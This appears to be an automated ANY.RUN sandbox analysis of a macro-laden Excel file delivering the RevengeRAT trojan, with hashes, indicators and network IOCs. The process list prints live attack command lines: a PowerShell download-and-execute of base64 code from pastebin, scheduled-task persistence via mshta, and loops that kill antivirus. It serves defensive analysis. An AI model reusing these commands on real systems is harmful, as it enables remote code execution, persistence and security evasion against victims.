analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Purchase0124_S.LLC.xls

Full analysis: https://app.any.run/tasks/dc71c7ac-dc31-4c37-ad8d-ae85e5b0ce2f
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: January 22, 2019, 12:22:22
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
trojan
rat
revenge
maldoc-19
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jan 17 18:45:31 2019, Security: 0
MD5:

C40391DE6144B5E1CCBEF7F0E985D70C

SHA1:

2E8372C22C3581D07BCE7697495B65B7F2E43E6E

SHA256:

6B839EA4B13B2A974E62FD87443A8D0C379A7E87493FB71916ECC99C2EA28D52

SSDEEP:

768:SgwfZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAKb4Hv55lqF4hLLD1LsAukYD0:GfZ+RwPONXoRjDhIcp0fDlaGGx+cL26D

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • EXCEL.EXE (PID: 2992)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2992)
    • Changes settings of System certificates

      • mshta.exe (PID: 3328)
    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3612)
      • schtasks.exe (PID: 2260)
    • Uses Task Scheduler to run other applications

      • mshta.exe (PID: 3328)
    • REVENGE was detected

      • powershell.exe (PID: 2900)
    • Connects to CnC server

      • powershell.exe (PID: 2900)
  • SUSPICIOUS

    • Creates files in the user directory

      • mshta.exe (PID: 3328)
      • powershell.exe (PID: 2900)
    • Uses TASKKILL.EXE to kill Office Apps

      • cmd.exe (PID: 2552)
    • Starts CMD.EXE for commands execution

      • mshta.exe (PID: 3328)
    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3328)
    • Executes PowerShell scripts

      • forfiles.exe (PID: 2608)
    • Uses TASKKILL.EXE to kill process

      • cmd.exe (PID: 2552)
      • forfiles.exe (PID: 316)
      • forfiles.exe (PID: 2440)
      • forfiles.exe (PID: 3800)
      • forfiles.exe (PID: 3156)
      • forfiles.exe (PID: 2524)
    • Connects to unusual port

      • powershell.exe (PID: 2900)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2992)
    • Reads internet explorer settings

      • mshta.exe (PID: 3328)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (48)
.xls | Microsoft Excel sheet (alternate) (39.2)

EXIF

FlashPix

Author: -
LastModifiedBy: -
Software: Microsoft Excel
CreateDate: 2006:09:16 00:00:00
ModifyDate: 2019:01:17 18:45:31
Security: None
CodePage: Windows Latin 1 (Western European)
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • Sheet1
  • Sheet2
  • Sheet3
HeadingPairs:
  • Worksheets
  • 3
CompObjUserTypeLen: 38
CompObjUserType: Microsoft Office Excel 2003 Worksheet
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
105
Monitored processes
69
Malicious processes
10
Suspicious processes
2

Behavior graph

Click at the process to see the details
start excel.exe no specs mshta.exe schtasks.exe no specs cmd.exe no specs cmd.exe no specs schtasks.exe no specs cmd.exe no specs forfiles.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs #REVENGE powershell.exe taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs forfiles.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2992"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
1
Version:
14.0.6024.1000
3328mshta http://bit.ly/SusuMuliC:\Windows\system32\mshta.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3612"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn "MSOFFICEER" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://b67x.blogspot.com/p/blog-page.html\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4028"C:\Windows\System32\cmd.exe" /C forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & forfiles /c "taskkill /f /im AvastUi.exe" & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4068"C:\Windows\System32\cmd.exe" /C forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2260"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 10 /tn "MS-OFFICE" /tr "mshta vbscript:CreateObject(\"Wscript.Shell\").Run(\"mshta.exe https://pastebin.com/raw/urGHE2PF\",0,true)(window.close)" /F C:\Windows\System32\schtasks.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2552"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im mshta.exe & exitC:\Windows\System32\cmd.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
128
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2440forfiles /c "taskkill /f /im AvastUi.exe" C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2608forfiles /c "powershell -noexit [ReFlEcTiOn.AsSeMbLy]::LoAd([CoNvErT]::FrOmBaSe64StRiNg((NeW-ObJeCt NeT.WeBClIeNt).DoWnLoAdStRiNg('https://pastebin.com/raw/7ihEfAZF'))).EnTrYPoInT.InVoKe($N,$N);Sleep -s 100000"C:\Windows\system32\forfiles.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
ForFiles - Executes a command on selected files
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3476taskkill /f /im winword.exe C:\Windows\system32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Terminates Processes
Exit code:
128
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 206
Read events
1 019
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
3
Text files
14
Unknown types
1

Dropped files

PID
Process
Filename
Type
2992EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR8F36.tmp.cvr
MD5:
SHA256:
3328mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\authorization[1].css
MD5:
SHA256:
2900powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A0DYUMKYFA0Q80DQFJ1U.temp
MD5:
SHA256:
2992EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DF3C6DEE553784ECBD.TMP
MD5:
SHA256:
3328mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\211300122-widgets[1].jstext
MD5:12926C0E6033D425F424771F4BBE3A7C
SHA256:4DC814BE3C423A930D46F18AD50F1F3DB9B57F4F657DC7ED7C9D1F825F7A9E89
3328mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\2727757643-css_bundle_v2[1].csstext
MD5:C6BEF00B7471799FB84ECD3C7D93B889
SHA256:797E19AC51BD552CB84849B171FAD7CF0563B4A14BDC3F751D1EDAC71064FF56
3328mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bit[1].txttext
MD5:C49A09875E226AF57B3CC1BF831A5A1B
SHA256:1F4A6E5D48650C8A1AFD35A0735E84DB648F7CD11ECF490DB10233F3515BBCFA
2992EXCEL.EXEC:\Users\admin\AppData\Local\Temp\~DFB8E83CABA217B36A.TMPdocument
MD5:8C3087C280F60BD4A59CC5E26859C9A0
SHA256:1820E743F4F9FFC3F0F359097FA48F4E4A513225D0837CFBDBD0CA3582EF2AB8
3328mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D2YPIJ90\864213505-ieretrofit[1].jstext
MD5:364501E083769DD2522BD01655BF399D
SHA256:0C20A9CE611E3EE5B32F6FF83F04D64EC7CFE867139AD51AA4E4AF210E1C9832
3328mshta.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
9
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3328
mshta.exe
GET
301
67.199.248.11:80
http://bit.ly/SusuMuli
US
html
122 b
shared
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3328
mshta.exe
172.217.22.65:443
b67x.blogspot.com
Google Inc.
US
whitelisted
3328
mshta.exe
67.199.248.11:80
bit.ly
Bitly Inc
US
shared
2900
powershell.exe
104.20.209.21:443
pastebin.com
Cloudflare Inc
US
shared
3328
mshta.exe
172.217.16.201:443
www.blogger.com
Google Inc.
US
whitelisted
2900
powershell.exe
102.165.38.126:2336
jordanchen7361.sytes.net
malicious

DNS requests

Domain
IP
Reputation
bit.ly
  • 67.199.248.11
  • 67.199.248.10
shared
b67x.blogspot.com
  • 172.217.22.65
whitelisted
www.blogger.com
  • 172.217.16.201
shared
resources.blogblog.com
  • 172.217.16.201
whitelisted
pastebin.com
  • 104.20.209.21
  • 104.20.208.21
shared
jordanchen736.sytes.net
  • 0.0.0.0
malicious
jordanchen7361.sytes.net
  • 102.165.38.126
malicious

Threats

PID
Process
Class
Message
3328
mshta.exe
A Network Trojan was detected
MALWARE [PTsecurity] PowerShell.Downloader httpHeader
2900
powershell.exe
A Network Trojan was detected
SC BACKDOOR Backdoor RevengeRAT Win32
2900
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2900
powershell.exe
A Network Trojan was detected
SC BACKDOOR Backdoor RevengeRAT Win32
2900
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin
2 ETPRO signatures available at the full report
No debug info